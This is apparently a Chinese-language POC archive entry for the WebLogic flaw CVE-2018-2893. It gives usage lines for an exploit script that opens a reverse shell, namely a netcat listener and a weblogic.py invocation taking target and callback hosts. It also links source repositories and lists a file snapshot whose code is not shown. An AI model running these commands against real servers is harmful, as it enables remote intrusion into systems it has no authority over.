关联漏洞
描述
可以直接反弹shell
介绍
**CVE-2018-2893**
> 可以直接反弹shell
**Usage**
监听
nc -lvvp reverse_port
发送payload
python weblogic.py target_host target_port reverse_host reverse_port
**Reffer**
[bigsizeme](https://github.com/bigsizeme/CVE-2018-2893)
[pyn3rd](https://github.com/pyn3rd/CVE-2018-2893)
**说明**
> 仅用于测试和交流学习,勿作他用
文件快照
[4.0K] /data/pocs/2c43e45258c82eaa613351a8ab13c489ee9fd8b8
├── [ 361] README.md
├── [8.5K] weblogic.py
└── [ 455] 未命名绘图.drawio
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。